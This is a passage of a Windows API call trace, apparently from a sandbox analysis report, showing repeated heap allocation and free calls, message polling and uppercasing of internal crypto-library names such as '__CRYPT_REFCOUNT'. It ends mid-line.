1 [0187.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0187.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0187.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0187.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0187.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0187.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0187.172] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0187.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0187.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0187.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0187.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0187.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0187.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0187.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0187.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0187.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0187.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0187.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0187.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0187.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0187.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0187.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0187.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0187.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0187.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0187.173] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0187.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0187.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0187.173] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0187.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0187.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0187.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0187.173] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0187.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0187.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0187.173] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0187.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0187.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0187.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0187.173] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0187.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0187.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0187.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0187.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0187.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0187.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0187.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0187.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0187.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0187.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0187.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0187.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0187.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0187.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0187.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0187.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0187.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0187.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0187.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0187.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0187.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0187.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0187.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0187.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0187.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0187.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0187.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0187.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0187.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0187.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0187.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0187.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0187.175] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0187.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0187.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0187.175] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0187.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0187.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0187.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0187.175] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0187.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0187.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0187.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0187.175] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0187.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0187.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0187.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0187.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0187.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0187.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0187.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0187.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0187.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0187.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0187.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0187.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0187.176] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0187.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0187.176] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0187.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0187.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0187.176] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0187.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0187.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0187.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0187.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0187.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0187.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0187.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0187.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0187.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0187.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0187.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0187.177] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0187.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0187.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0187.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0187.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0187.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0187.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0187.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0187.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0187.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0187.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0187.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0187.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0187.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0187.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0187.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0187.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0187.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0187.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0187.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0187.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0187.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0187.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0187.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0187.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0187.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0187.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0187.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0187.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0187.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0187.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0187.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0187.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0187.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0187.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0187.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0187.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0187.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0187.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0187.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0187.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0187.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0187.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0187.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0187.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0187.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0187.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0187.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0187.179] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0187.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0187.179] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0187.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0187.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0187.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0187.179] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0187.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0187.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0187.179] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0187.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0187.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0187.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0187.180] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0187.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0187.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0187.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0187.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0187.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0187.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0187.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0187.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0187.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0187.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0187.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0187.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0187.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0187.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0187.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0187.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0187.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0187.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0187.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0187.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0187.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0187.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0187.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0187.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0187.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0187.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0187.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0187.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0187.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0187.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0187.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0187.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0187.181] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0187.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0187.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0187.181] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0187.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0187.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0187.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0187.181] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0187.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0187.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0187.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0187.182] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0187.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0187.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0187.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0187.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0187.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0187.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0187.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 